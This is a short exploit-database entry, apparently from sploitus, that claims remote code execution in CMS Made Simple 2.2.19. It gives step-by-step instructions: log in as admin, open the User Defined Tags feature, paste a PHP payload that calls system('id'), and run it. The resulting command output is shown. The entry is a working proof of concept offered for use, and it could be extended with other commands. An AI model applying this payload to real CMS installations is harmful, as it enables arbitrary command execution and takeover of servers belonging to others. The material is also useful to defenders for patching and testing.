Share
## https://sploitus.com/exploit?id=1337DAY-ID-39356
# Exploit Title: CMS Made Simple Version: 2.2.19 - Remote Code Execution
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cmsmadesimple.org/
# Version: 2.2.19
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple


1 ) log in as admin and go to Extensions > User Defined Tags >
2 ) Write in Code place payload > <?php echo system('id'); ?>
3 ) After click run you will be see result :
uid=1000(admin) gid=1000(admin) groups=1000(admin) uid=1000(admin) gid=1000(admin) groups=1000(admin)